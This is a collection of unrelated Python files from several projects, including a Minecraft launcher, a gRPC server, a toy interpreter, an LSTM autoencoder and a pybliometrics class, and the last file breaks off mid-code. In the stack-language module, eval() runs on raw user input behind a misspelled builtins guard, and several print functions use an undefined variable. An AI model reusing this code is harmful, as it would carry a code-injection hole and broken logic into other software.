'-Djava.library.path=/usr/local/share/lwjgl3/', '-Dminecraft.launcher.brand=minecraft-launcher-lib', '-Dminecraft.launcher.version=2.1', '-cp', libdir + 'com/mojang/blocklist/1.0.6/blocklist-1.0.6.jar:' + libdir + 'com/mojang/patchy/2.1.6/patchy-2.1.6.jar:' + libdir + 'com/github/oshi/oshi-core/5.8.2/oshi-core-5.8.2.jar:' + libdir + 'net/java/dev/jna/jna/5.9.0/jna-5.9.0.jar:' + libdir + 'net/java/dev/jna/jna-platform/5.9.0/jna-platform-5.9.0.jar:' + libdir + 'org/slf4j/slf4j-api/1.8.0-beta4/slf4j-api-1.8.0-beta4.jar:' + libdir + 'org/apache/logging/log4j/log4j-slf4j18-impl/2.14.1/log4j-slf4j18-impl-2.14.1.jar:' + libdir + 'com/ibm/icu/icu4j/69.1/icu4j-69.1.jar:' + libdir + 'com/mojang/javabridge/1.2.24/javabridge-1.2.24.jar:' + libdir + 'net/sf/jopt-simple/jopt-simple/5.0.4/jopt-simple-5.0.4.jar:' + libdir + 'io/netty/netty-all/4.1.68.Final/netty-all-4.1.68.Final.jar:' + libdir + 'com/google/guava/failureaccess/1.0.1/failureaccess-1.0.1.jar:' + libdir + 'com/google/guava/guava/31.0.1-jre/guava-31.0.1-jre.jar:' + libdir + 'org/apache/commons/commons-lang3/3.12.0/commons-lang3-3.12.0.jar:' + libdir + 'commons-io/commons-io/2.11.0/commons-io-2.11.0.jar:' + libdir + 'commons-codec/commons-codec/1.15/commons-codec-1.15.jar:' + libdir + 'com/mojang/brigadier/1.0.18/brigadier-1.0.18.jar:' + libdir + 'com/mojang/datafixerupper/4.0.26/datafixerupper-4.0.26.jar:' + libdir + 'com/google/code/gson/gson/2.8.8/gson-2.8.8.jar:' + libdir + 'com/mojang/authlib/3.2.38/authlib-3.2.38.jar:' + libdir + 'org/apache/commons/commons-compress/1.21/commons-compress-1.21.jar:' + libdir + 'org/apache/httpcomponents/httpclient/4.5.13/httpclient-4.5.13.jar:' + libdir + 'commons-logging/commons-logging/1.2/commons-logging-1.2.jar:' + libdir + 'org/apache/httpcomponents/httpcore/4.4.14/httpcore-4.4.14.jar:' + libdir + 'it/unimi/dsi/fastutil/8.5.6/fastutil-8.5.6.jar:' + libdir + 'org/apache/logging/log4j/log4j-api/2.14.1/log4j-api-2.14.1.jar:' + libdir + 'org/apache/logging/log4j/log4j-core/2.14.1/log4j-core-2.14.1.jar:' + lwjgl3_libs + libdir + 'com/mojang/text2speech/1.11.3/text2speech-1.11.3.jar:' + mc_directory + '/versions/' + mc_version + '/' + mc_version + '.jar', 'net.minecraft.client.main.Main', '--username', username, '--version', mc_version, '--gameDir', mc_directory, '--assetsDir', mc_directory + '/assets', '--assetIndex', asset_index, '--uuid', uuid, '--accessToken', token, '--userType', 'mojang', '--versionType', 'snapshot' ] # Start Minecraft subprocess.call(real_command)
nilq/baby-python
python
from concurrent import futures import logging import grpc import app_pb2 import app_pb2_grpc class Greeter(app_pb2_grpc.GreeterServicer): def SayHello(self, request, context): for key, value in context.invocation_metadata(): print('Received initial metadata: key=%s value=%s' % (key, value)) return app_pb2.HelloReply(message='Hello, %s!' % request.name) def SayHelloCS(self, requests, context): names = [] for request in requests: names.append(request.name) return app_pb2.HelloReply(message=f"Hello {', '.join(names)}") def SayHelloSS(self, request, context): yield app_pb2.HelloReply(message='Hello, %s!' % request.name) def SayHelloBI(self, requests, context): context.set_trailing_metadata(( ('checksum-bin', b'I agree'), ('retry', 'false'), )) for request in requests: yield app_pb2.HelloReply(message='Hello, %s!' % request.name) def SayHelloBytes(self, request, context): name = request.name.decode("utf-8") return app_pb2.HelloReply(message=f"Hello, {name}!") def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) app_pb2_grpc.add_GreeterServicer_to_server(Greeter(), server) server.add_insecure_port('[::]:50051') server.start() server.wait_for_termination() if __name__ == '__main__': logging.basicConfig() serve()
nilq/baby-python
python
# flake8: noqa: F401 from dataclasses import dataclass, field from datetime import datetime from typing import Any, Dict, List, Optional from trakt.core.models import ( Comment, Episode, Movie, Person, Season, Show, TraktList, User, ) from trakt.core.paths.response_structs.movie_structs import ( AnticipatedMovie, BoxOffice, MovieCastCredit, MovieCheckin, MovieCredits, MovieCrewCredit, MovieCrewCredits, MoviePremiere, MovieRelease, MovieScrobble, MovieStats, MovieTranslation, MovieWithStats, Sharing, TrendingMovie, UpdatedMovie, ) from trakt.core.paths.response_structs.show_structs import ( AnticipatedShow, ShowCollectionProgress, ShowCredits, ShowStats, ShowTranslation, ShowWatchedProgress, ShowWithStats, TrendingShow, UpdatedShow, ) @dataclass class EpisodePremiere: first_aired: datetime episode: Episode show: Show @dataclass class Country: name: str code: str @dataclass class Certification: name: str slug: str description: str @dataclass class Genre: name: str slug: str @dataclass class Language: name: str code: str @dataclass class ListResponse: like_count: int comment_count: int list: TraktList user: User @dataclass class EpisodeCheckin: id: int watched_at: str sharing: Sharing episode: Episode show: Show @dataclass class Alias: title: str country: str @dataclass class CastMember: character: str person: Person @dataclass class CrewMember: job: str person: Person @dataclass class CrewList: production: List[CrewMember] = field(default_factory=list) art: List[CrewMember] = field(default_factory=list) crew: List[CrewMember] = field(default_factory=list) costume_make_up: List[CrewMember] = field(default_factory=list) directing: List[CrewMember] = field(default_factory=list) writing: List[CrewMember] = field(default_factory=list) sound: List[CrewMember] = field(default_factory=list) camera: List[CrewMember] = field(default_factory=list) @dataclass class CastCrewList: cast: List[CastMember] crew: CrewList @dataclass class RatingsSummary: rating: float votes: int distribution: Dict[Any, Any] @dataclass class Network: name: str @dataclass class CommentResponse: id: int created_at: datetime comment: str spoiler: bool review: bool replies: int likes: int user: User parent_id: Optional[int] = None user_rating: Optional[int] = None updated_at: Optional[datetime] = None sharing: Optional[Sharing] = None @dataclass class CommentItemOnly: type: str list: Optional[TraktList] = None movie: Optional[Movie] = None episode: Optional[Episode] = None show: Optional[Show] = None season: Optional[Season] = None @dataclass class CommentAndItem: type: str comment: Comment list: Optional[TraktList] = None movie: Optional[Movie] = None episode: Optional[Episode] = None show: Optional[Show] = None season: Optional[Season] = None @dataclass class SearchResult: type: str score: Optional[float] = None movie: Optional[Movie] = None list: Optional[TraktList] = None person: Optional[Person] = None episode: Optional[Episode] = None show: Optional[Show] = None @dataclass class EpisodeScrobble: id: int action: str progress: float sharing: Sharing episode: Episode show: Show @dataclass class SeasonEpisodeStats: watchers: int plays: int collectors: int collected_episodes: int comments: int lists: int votes: int @dataclass class EpisodeTranslation: title: str overview: str language: str @dataclass class CommentLiker: liked_at: datetime user: User
nilq/baby-python
python
import cPickle as pickle import theano_funcs import utils import vgg16 from lasagne.layers import set_all_param_values from tqdm import tqdm from os.path import join def warp_images(): print('building model') layers = vgg16.build_model((None, 3, 227, 227)) batch_size = 32 infer_dir = join('data', 'inference') weightsfile = join('weights', 'weights.pickle') with open(weightsfile, 'rb') as f: param_values = pickle.load(f) set_all_param_values(layers['trans'], param_values) pretrainfile = join('weights', 'vgg16.pkl') with open(pretrainfile, 'rb') as f: data = pickle.load(f) mean = data['mean value'] image_fpaths = [ ('Cars_013b.png', 'Cars_009b.png'), ('060_0071.png', '060_0000.png'), ('246_0052.png', '246_0042.png') ] print('compiling theano functions for inference') num_infer_idx = (len(image_fpaths) + batch_size - 1) / batch_size infer_func = theano_funcs.create_infer_func(layers) infer_iter = utils.get_batch_idx(len(image_fpaths), batch_size) for i, idx in tqdm(infer_iter, total=num_infer_idx, leave=False): Xa, Xb = utils.prepare_batch(image_fpaths[idx], mean) M = infer_func(Xa, Xb) utils.plot_samples(Xa, Xb, M, mean, prefix=join(infer_dir, 'infer_%d' % i)) if __name__ == '__main__': warp_images()
nilq/baby-python
python
from copy import deepcopy from re import match from .error import throw __all__ = [ 'Type', 'ModuleType', 'BooleanType', 'NoneType', 'NumberType', 'StringType', 'TupleType', 'ListType', 'NameType', 'SliceType', 'ArgType', 'ArgumentsType', 'FunctionType', 'BuiltinFunctionType', 'true', 'false', 'none', 'RESERVED', 'DEFAULT_ENV', 'CONSTRUCTOR_TYPES', ] class Type: pass class ModuleType(Type): # ----- Initialization Methods ----- # def __init__(self, env, /): self.env = deepcopy(env) # ----- Informal Methods ----- # def __repr__(self, /): return f'Module({self.env})' class BooleanType(Type): # ----- Initialization Methods ----- # def __init__(self, value, /): self.value = value # ----- Informal Methods ----- # def __repr__(self, /): return 'true' if self.value else 'false' # ----- Transformation Methods ----- # def __hash__(self, /): return hash(self.value) def __bool__(self, /): return self.value def __neg__(self, /): return NumberType(-self.value) def __pos__(self, /): return NumberType(+self.value) def __invert__(self, /): return BooleanType(not self.value) # ----- Bitwise Calculation Methods ----- # def __and__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value & other.value) else: return NotImplemented def __or__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value | other.value) else: return NotImplemented def __xor__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value ^ other.value) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): if obj is None: return cls(False) else: return cls(True if obj.eval(env=env) else False) class NoneType(Type): # ----- Initialization Methods ----- # def __init__(self, /): pass # ----- Transformation Methods ----- # def __hash__(self, /): return hash(None) def __bool__(self, /): return False # ----- Informal Methods ----- # def __repr__(self, /): return 'none' class NumberType(Type): # ----- Initialization Methods ----- # def __init__(self, value, /): self.value = value # ----- Informal Methods ----- # def __repr__(self, /): if self.value % 1 == 0: return f'{self.value:.0f}' else: return f'{self.value}' # ----- Transformation Methods ----- # def __hash__(self, /): return hash(self.value) def __bool__(self, /): return True if self.value else False def __neg__(self, /): return NumberType(-self.value) def __pos__(self, /): return self def __invert__(self, /): if self.value % 1 == 0: return NumberType(~int(self.value)) else: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be inverted', line=True) # ----- Comparison Methods ----- # def __lt__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value < other.value) else: return NotImplemented def __le__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value <= other.value) else: return NotImplemented def __eq__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value == other.value) else: return NotImplemented def __ne__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value != other.value) else: return NotImplemented def __gt__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value > other.value) else: return NotImplemented def __ge__(self, other, /): if isinstance(other, NumberType): return BooleanType(self.value >= other.value) else: return NotImplemented # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value + other.value) else: return NotImplemented def __sub__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value - other.value) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value * other.value) else: return NotImplemented def __truediv__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value / other.value) else: return NotImplemented def __floordiv__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value // other.value) else: return NotImplemented def __mod__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value % other.value) else: return NotImplemented def __pow__(self, other, /): if isinstance(other, NumberType): return NumberType(self.value ** other.value) else: return NotImplemented def __lshift__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in << operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in << operations', line=True) return NumberType(int(self.value) << int(other.value)) else: return NotImplemented def __rshift__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in >> operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in >> operations', line=True) return NumberType(int(self.value) >> int(other.value)) else: return NotImplemented # ----- Bitwise Calculation Methods ----- # def __and__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in & operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in & operations', line=True) return NumberType(int(self.value) & int(other.value)) else: return NotImplemented def __xor__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in ^ operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in ^ operations', line=True) return NumberType(int(self.value) ^ int(other.value)) else: return NotImplemented def __or__(self, other, /): if isinstance(other, NumberType): if self.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in | operations', line=True) if other.value % 1 != 0: throw(self.value.info, self.value.token, 'TypeError', 'floats cannot be in | operations', line=True) return NumberType(int(self.value) | int(other.value)) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): if obj is None: return cls(0) value = obj.eval(env=env) if isinstance(value, BooleanType): return cls(+value.value) elif isinstance(value, NumberType): return cls(value.value) elif isinstance(value, StringType): if match(r'^\d+(\.(\d+)?)?([Ee][+\-]?\d+)?' r'|(\d+)?\.\d+([Ee][+\-]?\d+)?$', value.value): return cls(eval(value.value)) else: throw(obj.info, obj.token, 'ValueError', f"could not convert string to float: {value.value!r}", line=True) else: throw(obj.info, obj.token, 'ValueError', f"Number() argument must be a string or a number, " f"not '{type(value).__name__}'", line=True) class StringType(Type): # ----- Initialization Methods ----- # def __init__(self, value, /): self.value = value # ----- Informal Methods ----- # def __repr__(self, /): return f'{self.value!r}' def __str__(self, /): return self.value # ----- Transformation Methods ----- # def __hash__(self, /): return hash(self.value) def __bool__(self, /): return True if self.value else False # ----- Iterable Methods ----- # def __len__(self, /): return len(self.value) def __getitem__(self, key, /): if isinstance(key, int): return self.value[key] else: slice = [] for item in (key.start, key.stop, key.step): if isinstance(item, NumberType): slice.append(int(item.value)) else: slice.append(None) start, stop, step = slice return self.value[start:stop:step] def __iter__(self, /): return iter(self.value) def __contains__(self, item, /): return item.value in self.value # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, StringType): return StringType(self.value + other.value) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, StringType): return StringType(self.value * other.value) else: return NotImplemented def __rmul__(self, other, /): if isinstance(other, StringType): return StringType(self.value * other.value) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): return cls('' if obj is None else f'{obj.eval(env=env)}') class TupleType(Type): # ----- Initialization Methods ----- # def __init__(self, values, /): self.values = values # ----- Informal Methods ----- # def __repr__(self, /): return f'{self.values}' # ----- Transformation Methods ----- # def __bool__(self, /): return True if self.values else False # ----- Iterable Methods ----- # def __len__(self, /): return len(self.values) def __getitem__(self, key, /): if isinstance(key, int): return self.values[key] else: slice = [] for item in (key.start, key.stop, key.step): if isinstance(item, NumberType): slice.append(int(item.value)) else: slice.append(None) start, stop, step = slice return self.values[start:stop:step] def __iter__(self, /): return iter(self.values) def __contains__(self, item, /): return item in self.values # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, TupleType): return TupleType(self.values + other.values) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, TupleType): return TupleType(self.values * other.values) else: return NotImplemented def __rmul__(self, other, /): if isinstance(other, TupleType): return TupleType(self.values * other.values) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): return cls(() if obj is None else tuple(obj.eval(env=env))) class ListType(Type): # ----- Initialization Methods ----- # def __init__(self, values, /): self.values = values # ----- Informal Methods ----- # def __repr__(self, /): return f'{self.values}' # ----- Transformation Methods ----- # def __bool__(self, /): return True if self.values else False # ----- Iterable Methods ----- # def __len__(self, /): return len(self.values) def __getitem__(self, key, /): if isinstance(key, int): return self.values[key] else: slice = [] for item in (key.start, key.stop, key.step): if isinstance(item, NumberType): slice.append(int(item.value)) else: slice.append(None) start, stop, step = slice return self.values[start:stop:step] def __iter__(self, /): return iter(self.values) def __contains__(self, item, /): return item in self.values # ----- Calculation Methods ----- # def __add__(self, other, /): if isinstance(other, ListType): return ListType(self.values + other.values) else: return NotImplemented def __mul__(self, other, /): if isinstance(other, ListType): return ListType(self.values * other.values) else: return NotImplemented def __rmul__(self, other, /): if isinstance(other, ListType): return ListType(self.values * other.values) else: return NotImplemented # ----- Inner Operations ----- # @classmethod def construct(cls, obj=None, /, *, env): return cls([] if obj is None else [*obj.eval(env=env)]) class NameType(Type): # ----- Initialization Methods ----- # def __init__(self, id, /): self.id = id class SliceType(Type): # ----- Initialization Methods ----- # def __init__(self, start, stop, step, /): self.start = start self.stop = stop self.step = step # ----- Informal Methods ----- # def __repr__(self, /): return f'SliceType({self.start}, {self.stop}, {self.step})' class ArgType(Type): # ----- Initialization Methods ----- # def __init__(self, arg, /): self.arg = arg class ArgumentsType(Type): # ----- Initialization Methods ----- # def __init__(self, /, *, posonlyargs=None, args=None, vararg=None, kwonlyargs=None, kw_defaults=None, kwarg=None, defaults=None): self.posonlyargs = [] if posonlyargs is None else posonlyargs self.args = [] if args is None else args self.vararg = vararg self.kwonlyargs = [] if kwonlyargs is None else kwonlyargs self.kw_defaults = [] if kw_defaults is None else kw_defaults self.kwarg = kwarg self.defaults = [] if defaults is None else defaults class FunctionType(Type): # ----- Initialization Methods ----- # def __init__(self, /, name=None, args=None, body=None, *, qualname=None): self.name = '<anonymous>' if name is None else name self.args = ArgumentsType() if args is None else args self.body = [] if body is None else body self.qualname = self.name if qualname is None else qualname # ----- Informal Methods ----- # def __repr__(self, /): return f'<function {self.qualname} at {id(self):#x}>' # ----- Functional Methods ----- # def __call__(self, arguments, /): pass class BuiltinFunctionType(Type): # ----- Initialization Methods ----- # def __init__(self, /): self.name = '<anonymous>' self.args = ArgumentsType() # ----- Informal Methods ----- # def __repr__(self, /): return f'<built-in function {self.name}>' # ----- Functional Methods ----- # def __call__(self, /): pass class PrintFunction(BuiltinFunctionType): # ----- Initialization Methods ----- # def __init__(self, /): self.name = 'print' self.args = ArgumentsType() # ----- Functional Methods ----- # def __call__(self, /): pass false = BooleanType(False) true = BooleanType(True) none = NoneType() RESERVED = { 'false': false, 'true': true, 'none': none, } DEFAULT_ENV = { # 'print': BuiltinFunctionType('print'), } CONSTRUCTOR_TYPES = { 'Boolean': BooleanType, 'Number': NumberType, 'String': StringType, 'Tuple': TupleType, 'List': ListType, }
nilq/baby-python
python
from __future__ import division import subprocess import ase print(ase.data.chemical_symbols) for pseudo,pseudo_min in zip(["LDA", "GGA"], ["lda", "gga"]): for sym in ase.data.chemical_symbols: cmd = "wget https://departments.icmab.es/leem/siesta/Databases/Pseudopotentials/Pseudos_" + pseudo + "_Abinit/" + sym + "_html/" + sym + ".psf" print(cmd) subprocess.call(cmd, shell=True) try: cmd = "mv " + sym + ".psf " + sym + "." + pseudo_min + ".psf" print(cmd) subprocess.call(cmd, shell = True) except: print("no file " + sym + ".psf")
nilq/baby-python
python
import Item import Shop item = Item.Item("first module item", 10) shop = Shop.Shop() if __name__ == "__main__": print item print shop
nilq/baby-python
python
import os, sys # import FIFE main module from fife import fife # import the ApplicationBase from fife.extensions.basicapplication import ApplicationBase # import FIFE pychan module from fife.extensions import pychan # import scripts from scripts import gameplay from scripts.common import eventListenerBase class GameListener(eventListenerBase.EventListenerBase): def __init__(self, engine, gameplay): super(GameListener, self).__init__(engine, regKeys=True, regCmd=True, regMouse=False, regConsole=True, regWidget=True) self._engine = engine self._gameplay = gameplay self._quit = False def keyPressed(self, event): keyval = event.getKey().getValue() keystr = event.getKey().getAsString().lower() consumed = False if keyval == fife.Key.ESCAPE: self._gameplay.showMainMenu() event.consume() def onCommand(self, command): self._quit = (command.getCommandType() == fife.CMD_QUIT_GAME) if self._quit: command.consume() class Game(ApplicationBase): """ The main application. Inherit the fife.extensions.ApplicationBase """ def __init__(self, settings): super(Game, self).__init__(settings) self._gameplay = gameplay.Gameplay(self, self.engine, self._setting) self._listener = GameListener(self.engine, self._gameplay) def requestQuit(self): cmd = fife.Command() cmd.setSource(None) cmd.setCommandType(fife.CMD_QUIT_GAME) self.engine.getEventManager().dispatchCommand(cmd) def createListener(self): pass # already created in construct def _pump(self): if self._listener._quit: self.breakRequested = True else: self._gameplay.pump()
nilq/baby-python
python
import re from modules import RGSubModule from functions import RGFunctionFactory import base import state module = RGSubModule('t') base.base(module) #__all__ = ["module"] apply = base.apply @module @RGFunctionFactory('a') def ta(stack): stack.append(input()) @module @RGFunctionFactory('b') def tb(stack): stack.append(int(input())) @module @RGFunctionFactory('c') def tc(stack): stack.append(float(input())) @module @RGFunctionFactory('d') def td(stack): item = input() item_ = eval(item, {"__buitins__": None}, {}) if not isinstance(item_, list): raise TypeError stack.append(item_) @module @RGFunctionFactory('e') def te(stack): stack.append(Routine(input())) @module @RGFunctionFactory('f') def tf(stack): item = input() stack.append(eval(item, {"__buitins__": None}, {})) @module @RGFunctionFactory('A') def tA(stack): "print(stack.pop())" print(stack.pop()) @module @RGFunctionFactory('B') def tB(stack): "print(stack[-1])" print(stack[-1]) @module @RGFunctionFactory('C') def tC(stack): "print(stack)" print(stack) @module @RGFunctionFactory('D') def tD(stack): "print(stack) separated by spaces" for i in range(len(stack)): print(item, end=' '*(i==len(stack)-1)) print() @module @RGFunctionFactory('E') def tE(stack): "print(stack) as concatenated strings" for i in range(len(stack)): print(item, end='') print() @module @RGFunctionFactory('F') def tF(stack): "print(stack), emptying stack" print(stack) stack[:] = [] @module @RGFunctionFactory('G') def tG(stack): "print(stack) separated by spaces, emptying stack" print(*stack, sep=' ') stack[:] = [] @module @RGFunctionFactory('H') def tH(stack): "print(stack) as concatenated strings, emptying stack" for i in range(len(stack)): print(item, end='') print() stack[:] = [] @module @RGFunctionFactory('p') def tp(stack): "unconditional immediate quit (no printing)" state.running = False @module @RGFunctionFactory('P') def tP(stack): "conditional immediate quit (no printing) based on top of stack" b = False if len(stack) > 0: b = stack.pop() state.running = bool(b) and state.running @module @RGFunctionFactory('q') def tq(stack): "unconditional quit, printing space separated" tG(stack) # print space separated state.running = False @module @RGFunctionFactory('Q') def tQ(stack): "unconditional quit, printing based on arg" if len(stack) < 1: pass elif float(stack[-1]) <= 1.0: tG(stack) # print space separated elif float(stack[-1]) <= 2.0: tH(stack) # print concatenated elif float(stack[-1]) <= 3.0: tF(stack) # print as list state.running = False @module @RGFunctionFactory('r') def tr(stack): "conditional quit, printing space separated" if len(stack) < 1 or bool(stack[-1]): tG(stack) # print space separated state.running = False else: tD(stack) # print space separated, leaving stack @module @RGFunctionFactory('R', 1) def tR(stack): "conditional quit, printing based on arg: (bool arg tR) will quit if bool and print if arg (even if it doesnt quit)" arg = stack.pop() b = False if len(stack) > 0: b = stack.pop() elif float(arg) <= 1.0: tD(stack) # print space separated elif float(arg) <= 2.0: tE(stack) # print concatenated elif float(arg) <= 3.0: tC(stack) # print as list state.running = bool(b) and state.running if not state.running: stack[:] = [] @module @RGFunctionFactory('t') def tt(stack): "reverse stack" stack[:] = stack[::-1] @module @RGFunctionFactory('y') def ty(stack): state.debug_ = True @module @RGFunctionFactory('Y') def tY(stack): state.debug_ = False @module @RGFunctionFactory('z') def tz(_): "zoom in to top of stack" state.stack.zoomin() @module @RGFunctionFactory('Z') def tZ(_): "zoom out from stack to parent stack" state.stack.zoomout()
nilq/baby-python
python
# Basic libraries import numpy as np import tensorflow as tf import os from data_gen import get_next_batch from util import is_existing tf.reset_default_graph() tf.set_random_seed(2016) np.random.seed(2016) # LSTM-autoencoder from LSTMAutoencoder import * # Constants batch_num = 1 hidden_num = 128 step_num = 200 # number of frames in video elem_num = 37604 # number of pixel in one frame epochs = 3000 dataset_name = 'UCSDped1' TRAIN_DIR = 'data/' + dataset_name + '/Train' n_train_video = len(os.listdir(TRAIN_DIR)) iter_per_epoch = int(n_train_video / batch_num) iteration = 10000 training_indexes = os.listdir(TRAIN_DIR) # placeholder list p_input = tf.placeholder(tf.float32, shape=(batch_num, step_num, elem_num)) p_inputs = [tf.squeeze(t, [1]) for t in tf.split(p_input, step_num, 1)] cell = tf.nn.rnn_cell.LSTMCell(hidden_num, use_peepholes=True) ae = LSTMAutoencoder(hidden_num, p_inputs, cell=cell, decode_without_input=True) with tf.Session() as sess: sess.run(tf.global_variables_initializer()) sequences = None saver = tf.train.Saver() model_name = "videoae_" + dataset_name + '_' + str(hidden_num) + ".ckpt" if is_existing(model_name): saver.restore(sess, "models/" + str(hidden_num) + "/" + model_name) for i in range(epochs): # if batchsize > 1 should shuffle dataset for j in range(iter_per_epoch): sequences = get_next_batch(j, batch_num) (loss_val, _) = sess.run([ae.loss, ae.train], {p_input: sequences}) print('Epoch ', i,' iter %d:' % (j + 1), loss_val) (input_, output_) = sess.run([ae.input_, ae.output_], {p_input: sequences}) print('train result :') print('input :', input_[0, :, :].flatten()) print(input_[0, :, :].flatten().shape) print('output :', output_[0, :, :].flatten()) print('diff value :', np.sum(input_[0, :, :].flatten() - output_[0, :, :].flatten())) file_path = "models/" + str(hidden_num) + "/" + model_name save_path = saver.save(sess, file_path) print("Model saved in path: %s" % save_path)
nilq/baby-python
python
from collections import namedtuple from pybliometrics.scopus.superclasses import Retrieval from pybliometrics.scopus.utils import chained_get, get_id, detect_id_type,\ get_link, listify class AbstractRetrieval(Retrieval): @property def abstract(self): """The abstract of a document. Note: If this is empty, try property description instead. """ return self._head.get('abstracts') @property def affiliation(self): """A list of namedtuples representing listed affiliations in the form (id, name, city, country). Note: Might be empty. """ out = [] aff = namedtuple('Affiliation', 'id name city country') affs = listify(self._json.get('affiliation', [])) for item in affs: new = aff(id=item.get('@id'), name=item.get('affilname'), city=item.get('affiliation-city'), country=item.get('affiliation-country')) out.append(new) return out or None @property def aggregationType(self): """Aggregation type of source the document is published in.""" return chained_get(self._json, ['coredata', 'prism:aggregationType']) @property def authkeywords(self): """List of author-provided keywords of the document.""" keywords = self._json.get('authkeywords') if not keywords: return None else: try: return [d['$'] for d in keywords['author-keyword']] except TypeError: # Singleton keyword return [keywords['author-keyword']['$']] @property def authorgroup(self): """A list of namedtuples representing the article's authors organized by affiliation, in the form (affiliation_id, dptid, organization, city, postalcode, addresspart, country, auid, indexed_name, surname, given_name). If "given_name" is not present, fall back to initials. Note: Affiliation information might be missing or mal-assigned even when it lookes correct in the web view. In this case please request a correction. """ out = [] fields = 'affiliation_id dptid organization city postalcode '\ 'addresspart country auid indexed_name surname given_name' auth = namedtuple('Author', fields) items = listify(self._head.get('author-group', [])) index_path = ['preferred-name', 'ce:indexed-name'] for item in items: if not item: continue # Affiliation information aff = item.get('affiliation', {}) try: aff_ids = listify(aff['affiliation-id']) aff_id = ", ".join([a["@afid"] for a in aff_ids]) except KeyError: aff_id = aff.get("@afid") org = _get_org(aff) # Author information (might relate to collaborations) authors = listify(item.get('author', item.get('collaboration', []))) for au in authors: try: given = au.get('ce:given-name', au['ce:initials']) except KeyError: # Collaboration given = au.get('ce:text') new = auth(affiliation_id=aff_id, organization=org, city=aff.get('city'), dptid=aff.get("@dptid"), postalcode=aff.get('postal-code'), addresspart=aff.get('address-part'), country=aff.get('country'), auid=au.get('@auid'), surname=au.get('ce:surname'), given_name=given, indexed_name=chained_get(au, index_path)) out.append(new) return out or None @property def authors(self): """A list of namedtuples representing the article's authors, in the form (auid, indexed_name, surname, given_name, affiliation_id, affiliation, city, country). Note: The affiliation referred to here is what Scopus' algorithm determined as the main affiliation. Property `authorgroup` provides all affiliations. """ out = [] fields = 'auid indexed_name surname given_name affiliation' auth = namedtuple('Author', fields) for item in chained_get(self._json, ['authors', 'author'], []): affs = [a for a in listify(item.get('affiliation')) if a] if affs: aff = [aff.get('@id') for aff in affs] else: aff = None new = auth(auid=item['@auid'], surname=item.get('ce:surname'), indexed_name=item.get('ce:indexed-name'), affiliation=aff, given_name=chained_get(item, ['preferred-name', 'ce:given-name'])) out.append(new) return out or None @property def citedby_count(self): """Number of articles citing the document.""" cites = chained_get(self._json, ['coredata', 'citedby-count']) if cites: cites = int(cites) return cites @property def citedby_link(self): """URL to Scopus page listing citing documents.""" return get_link(self._json, 2) @property def chemicals(self): """List of namedtuples representing chemical entities in the form (source, chemical_name, cas_registry_number). In case multiple numbers given, they are joined on ";". """ path = ['enhancement', 'chemicalgroup', 'chemicals'] items = listify(chained_get(self._head, path, [])) fields = 'source chemical_name cas_registry_number' chemical = namedtuple('Chemical', fields) out = [] for item in items: for chem in listify(item['chemical']): number = chem.get('cas-registry-number') try: # Multiple numbers given num = ";".join([n['$'] for n in number]) except TypeError: num = number new = chemical(source=item['@source'], cas_registry_number=num, chemical_name=chem['chemical-name']) out.append(new) return out or None @property def confcode(self): """Code of the conference the document belong to.""" return self._confevent.get('confcode') @property def confdate(self): """Date range of the conference the document belongs to represented by two tuples in the form (YYYY, MM, DD). """ dates = self._confevent.get('confdate', {}) try: keys = ("startdate", "enddate") date_order = ("@year", "@month", "@day") d = (tuple(int(dates[k1][k2]) for k2 in date_order) for k1 in keys) return tuple(d) except KeyError: return None @property def conflocation(self): """Location of the conference the document belongs to.""" return chained_get(self._confevent, ['conflocation', 'city-group']) @property def confname(self): """Name of the conference the document belongs to.""" return self._confevent.get('confname') @property def confsponsor(self): """Sponsor(s) of the conference the document belongs to.""" path = ['confsponsors', 'confsponsor'] sponsors = chained_get(self._confevent, path, []) if len(sponsors) == 0: return None if isinstance(sponsors, list): return [s['$'] for s in sponsors] return sponsors @property def contributor_group(self): """List of namedtuples representing contributors compiled by Scopus, in the form (given_name, initials, surname, indexed_name, role). """ path = ['source', 'contributor-group'] items = listify(chained_get(self._head, path, [])) out = [] fields = 'given_name initials surname indexed_name role' pers = namedtuple('Contributor', fields) for item in items: entry = item.get('contributor', {}) new = pers(indexed_name=entry.get('ce:indexed-name'), role=entry.get('@role'), 